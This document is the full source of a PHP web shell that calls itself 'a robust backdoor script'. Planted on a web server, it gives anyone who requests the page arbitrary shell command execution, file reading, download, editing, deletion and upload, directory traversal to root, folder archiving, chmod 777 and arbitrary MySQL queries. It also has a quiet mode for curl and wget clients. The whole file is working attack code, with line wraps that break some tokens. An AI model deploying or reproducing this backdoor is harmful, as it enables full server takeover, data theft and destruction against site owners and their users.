<?

php
// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
om/ [2011-03-15]
// This code is public domain and may be used in part or in full for any legal p
urpose. I would still appreciate a mention though :).
ImagePNG($image);
function isLinux($path)
{
return (substr($path,0,1)=="/" ? true : false);
}
function getSlashDir($isLinux)
{
return($isLinux ? '/' : '\\');
}
// See if we are on Linux or Windows because the paths have to be processed diff
erently
$cwd=getcwd();
$isLinux=isLinux($cwd);
if(!$isLinux)
{
$driveLetter=substr($cwd,0,1);
}
$slash=getSlashDir($isLinux);
$parts=explode($slash,$cwd);
$rootDir=($isLinux ? $slash : ($driveLetter . ':' . $slash));
function cleanPath($path,$isLinux)
{
$slash=getSlashDir($isLinux);
$parts=explode($slash,$path);
foreach($parts as $key=>$val) // Process '..' & '.' directories
{
if($val=="..")
{
$parts[$key]="";
$lastKey=$key-1;
$parts[$lastKey]="";
}
elseif($val==".")
{
$parts[$key]="";
}
}
reset($parts);
$fixedPath=($isLinux ? "/" : ""); // Some PHP configs wont automatically c
reate a variable on .= or will at least whine about it
$firstPiece=true;
foreach($parts as $val) // Assemble the path back together
{
if($val != "")
{
$fixedPath .= ($firstPiece ? '' : $slash) . $val;
$firstPiece=false;
}
}
if($fixedPath=="") // If we took out the entire path go to bottom level to
avoid an error
{
$fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash));
}
 // Make sure there is an ending slash
if(substr($fixedPath,-1)!=$slash)
$fixedPath .= $slash;
return $fixedPath;
}
if(isset($_REQUEST['chm']))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
echo (@chmod ($_REQUEST['chm'],0777) ? "Reassigned" : "Can't Reasign");
}
}
elseif(isset($_REQUEST['phpinfo']))
{
phpinfo();
}
elseif(isset($_REQUEST['dl']))
{
if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true)
{
$_REQUEST['dl'] .= $_REQUEST['file'];
if(substr($_REQUEST['dl'],0,1)==$slash)
$fileArr=explode($slash,$_REQUEST['dl']);
header('Content-disposition: attachment; filename=' . $_REQUEST['file'])
;
header('Content-type: application/octet-stream');
readfile($_REQUEST['dl']);
}
else
{
echo $_REQUEST['dl'];
}
}
elseif(isset($_REQUEST["gz"]))
{
if(!$isLinux)
{
echo "This feature only works on Linux";
}
else
{
$directory=$_REQUEST["gz"];
if(substr($directory,-1)=="/")
$directory=substr($directory,0,-1);
$dirParts=explode($slash,$directory);
$fname=$dirParts[(sizeof($dirParts)-1)];
$archive=time();
exec("cd $directory; tar czf $archive *");
$output=@file_get_contents($directory . "/" . $archive);
if(!$output)
header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
else
{
header("Content-disposition: attachment; filename=$fname.tgz");
echo $output;
}
 header('Content-type: application/octet-stream');
@unlink($directory . "/" . $archive);
}
}
elseif(isset($_REQUEST['f']))
{
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
header("Content-Type: text/plain");
fpassthru($file);
}
elseif(isset($_REQUEST['d']))
{
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle=opendir("$d"))
{
echo "<h2>Listing of ";
$conString="";
if($isLinux)
echo "<a href='?d=$slash'>$slash</a>";
foreach(explode($slash,cleanPath($d,$isLinux)) as $val)
{
$conString .= $val . $slash;
echo "<a href='?d=$conString'>" . $val . "</a>" . ($val != "" ? $sla
sh : '');
}
echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPa
th($d,$isLinux)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($d,$
isLinux)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank'
href='?gz=" . urlencode(cleanPath($d,$isLinux)) . "'>gzip & download folder</a>)
(<a target='_blank' href='?chm=" . urlencode(cleanPath($d,$isLinux)) . "'>chmod
folder to 777)</a> (these rarely work)<br />";
while ($dir=readdir($handle))
{
if (is_dir("$d$slash$dir"))
{
if($dir != "." && $dir !="..")
$dirList[]=$dir;
}
else
{
if(isset($_REQUEST["hldb"]))
{
$contents=file_get_contents("$d$slash$dir");
if (stripos($contents,"mysql_") || stripos($contents,"mysqli
_") || stripos($contents,"SELECT "))
{
$fileList[]=array('dir'=>$dir,'color'=>'red');
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
else
{
$fileList[]=array('dir'=>$dir,'color'=>'black');
}
}
 }
echo "<a href='?d=$d$slash.'><font color=grey>.\n</font></a>";
echo "<a href='?d=$d$slash..'><font color=grey>..\n</font></a>";
// Some configurations throw a notice if is_array is tried with a non-ex
istent variable
if(isset($dirList))
if(is_array($dirList))
foreach($dirList as $dir)
{
echo "<a href='?d=$d$slash$dir'><font color=grey>$dir\n</font></
a>";
}
if(isset($fileList))
if(is_array($fileList))
foreach($fileList as $dir)
{
echo "<a href='?f=$d" . $slash . $dir['dir'] . "'><font color=" . $d
ir['color'] . ">" . $dir['dir'] . "</font></a>" .
"|<a href='?dl=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir
"] . "' target='_blank'>Download</a>|" .
"|<a href='?ef=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir
"] . "' target='_blank'>Edit</a>|" .
"|<a href='?df=" . cleanPath($d,$isLinux) . '&file=' .$dir["dir
"] . "' target='_blank'>Delete</a>| \n";
}
}
else
echo "opendir() failed";
closedir($handle);
echo "</pre>";
}
elseif(isset($_REQUEST['c']))
{
if(@ini_get('safe_mode'))
{
echo 'Safe mode is on, the command is by default run though escapeshellc
md() and can only run programs in safe_mod_exec_dir (' . @ini_get('safe_mode_exe
c_dir') . ') <br />';
}
$USER_AGENT=strtolower(substr($_SERVER['HTTP_USER_AGENT'],0,4));
$SILENT_MODE=TRUE;
if ($USER_AGENT != "curl" && $USER_AGENT != "wget")
{
$SILENT_MODE=FALSE;
echo "<h2>Command: <I>" . $_REQUEST['c'] . "</I></h2><br /><br />";
}
trim(exec($_REQUEST['c'],$return));
foreach($return as $val)
{
if ($SILENT_MODE)
{
echo htmlentities($val);
}
else
{
echo '<pre>' . htmlentities($val) . '</pre>';
}
}
}
elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"]))
{
if(isset($_FILES["file_name"]))
{
if ($_FILES["file_name"]["error"] > 0)
{
echo "Error";
}
else
{
$target_path=$_COOKIE["uploadDir"];
if(substr($target_path,-1) != "/")
$target_path .= "/";
$target_path=$target_path . basename($_FILES['file_name']['name']);
if(move_uploaded_file($_FILES['file_name']['tmp_name'],$target_path)
) {
setcookie("uploadDir","");
echo "The file ". basename($_FILES['file_name']['name']).
" has been uploaded";
}
else
{
echo "Error copying file, likely a permission error.";
}
}
}
else
{
?>
<form target="_blank" action="" method="GET">
<input type="hidden" name="cc" value="1" />
Submit this form before submitting file (will open in new window):<b
r />
Upload Directory: <input type="text" name="dir" value="<?php echo $_
REQUEST["dir"]; ?>"><br />
<input type="submit" value="submit" />
</form>
<br /><br />
<form enctype="multipart/form-data" action="" method="post">
Upload file:<input name="file_name" type="file"><input type="submit" val
ue="Upload" /></form>
<?php
}
}
elseif(isset($_REQUEST['cc']))
{
setcookie("uploadDir",$_GET["dir"]);
echo "You are OK to upload the file, don't upload files to other directories
before completing this upload.";
}
elseif(isset($_REQUEST['mquery']))
{
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
@mysql_connect($host,$usr,$passwd) or die("Connection Error: " . mysql_error
());
 mysql_select_db($db);
$result=mysql_query($mquery);
if($result!=false)
{
echo "<h2>The following query has sucessfully executed</h2>" . htmlentit
ies($mquery) . "<br /><br />";
echo "Return Results:<br />";
$first=true;
echo "<table border='1'>";
while ($row=mysql_fetch_array($result,MYSQL_ASSOC))
{
if($first)
{
echo "<tr>";
foreach($row as $key=>$val)
{
echo "<td><b>$key</b></td>";
}
echo "</tr>";
reset($row);
$first=false;
}
echo "<tr>";
foreach($row as $val)
{
echo "<td>$val</td>";
}
echo "</tr>";
}
echo "</table>";
mysql_free_result($result);
}
else
{
echo "Query Error: " . mysql_error();
}
}
elseif(isset($_REQUEST['df']))
{
$_REQUEST['df'] .= $slash . $_REQUEST['file'];
if(@unlink($_REQUEST['df']))
{
echo "File deleted";
}
else
{
echo "Error deleting file";
}
}
elseif(isset($_REQUEST['ef']))
{
?>
<script type="text/javascript">
<!--
var key="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function encode64(inpStr)
{
inpStr=escape(inpStr);
var output="";
var chr1,chr2,chr3="";
 var enc1,enc2,enc3,enc4="";
var i=0;
do {
chr1=inpStr.charCodeAt(i++);
chr2=inpStr.charCodeAt(i++);
chr3=inpStr.charCodeAt(i++);
enc1=chr1 >> 2;
enc2=((chr1 & 3) << 4) | (chr2 >> 4);
enc3=((chr2 & 15) << 2) | (chr3 >> 6);
enc4=chr3 & 63;
if (isNaN(chr2))
{
enc3=enc4=64;
}
else if (isNaN(chr3))
{
enc4=64;
}
output=output +
key.charAt(enc1) +
key.charAt(enc2) +
key.charAt(enc3) +
key.charAt(enc4);
chr1=chr2=chr3=enc1=enc2=enc3=enc4="";
} while (i < inpStr.length);
return output;
}
//-->
</script>
<?php
$_REQUEST['ef'] .= $_REQUEST['file'];
if(isset($_POST["newcontent"]))
{
$_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
$stream=@fopen($_REQUEST['ef'],"w");
if($stream)
{
fwrite($stream,$_POST["newcontent"]);
echo "Write sucessful";
}
else
{
echo "Could not write to file";
}
fclose($stream);
}
?>
<form action="" name="f" method="POST">
<textarea wrap="off" rows="40" cols="130" name="newcontent"><?php echo file_
get_contents($_REQUEST['ef']); ?></textarea><br />
<input type="submit" value="I base64 encoded it myself, don't run script" />
<br />
<input type="submit" value="Change (requires JavaScript to work)" onclick="d
ocument.f.newcontent.value=encode64(document.f.newcontent.value);" />
</form>
<?php
}
else
{
?>
<b>Server Information:</b><br />
<i>
Operating System: <?php echo PHP_OS; ?><br />
PHP Version: <?php echo PHP_VERSION; ?>&nbsp;&nbsp;&nbsp;<a href="?phpinfo=true"
>View phpinfo()</a>
</i>
<br />
<br />
<b>Directory Traversal</b><br />
<a href="?d=<?php echo getcwd(); ?>"><b>Go to current working directory</b></a><
br />
<a href="?d=<?php echo $rootDir; ?>"><b>Go to root directory</b></a><br />
<b>Go to any directory:</b><form action="" method="GET"><input type="text" name=
"d" value="<?php echo $rootDir; ?>" /><input type="submit" value="Go" /></form>
<hr>Execute MySQL Query:
<form action="" METHOD="GET">
<table>
<tr><td>host</td><td><input type="text" name="host"value="localhost"></td></tr>
<tr><td>user</td><td><input type="text" name="usr" value="root"></td></tr>
<tr><td>password</td><td><input type="text" name="passwd"></td></tr>
<tr><td>database</td><td><input type="text" name="db"></td></tr>
<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></
textarea></td></tr>
<tr><td colspan="2"><input type="submit" value="Execute"></td></tr>
</table>
</form>
<hr>
<pre><form action="" METHOD="GET">Execute Shell Command (safe mode is <?php echo
(@ini_get('safe_mode') ? 'on' : 'off'); ?>): <input type="text" name="c"><input
type="submit" value="Go"></form></pre>
<?php
}
// Intentionally left open to avoid output the file download function 1